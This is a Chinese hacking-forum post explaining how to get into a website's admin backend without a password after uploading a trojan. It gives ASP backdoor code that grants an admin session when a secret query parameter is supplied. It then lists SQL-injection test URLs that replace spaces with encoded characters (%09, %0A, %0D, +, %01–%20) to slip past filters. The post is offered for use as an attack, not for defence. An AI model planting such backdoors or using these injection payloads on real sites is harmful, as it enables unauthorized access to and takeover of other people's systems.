主题 : 用WEBSHELL进后台无须密码及SQL注入空格替换
金秋果實豐 金風吹黃葉
级别: 七朵秋菊
UID: 33333
精华: 0
发帖: 7917
威望: 34658 点
无痕币: 605 WHB
贡献值: 0 点
在线时间: 3192(时)
注册时间: 2007-12-25
最后登录: 2022-08-05

0 用WEBSHELL进后台无须密码及SQL注入空格替换

利用WEBSHELL直接进入后台无须密码以及SQL注入空格替换


首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)



默认是:


  http://www.xxx.com/shownotice.asp?id=78 and 1=1
  实际上用%09   %0A   %0D   +都可以替代空格
  例如:
  http://www.xxx.com/shownotice.asp?id=78%09and%091=1
  http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1
  http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1
  http://www.xxx.com/shownotice.asp?id=78%+and+1=1
  以下可以在SQLServer2000下可以替换%01到%20都可以
  http://www.xxx.com/shownotice.asp?id=78%19and%191=1
秂生完整在于學繪勇敢麵對人生悲劇而繼續活下去
Total 0.037181(s) query 3, Time now is:04-23 22:53, Gzip enabled 粤ICP备07514325号-1
Powered by PHPWind v7.3.2 Certificate Code © 2003-13 秋无痕论坛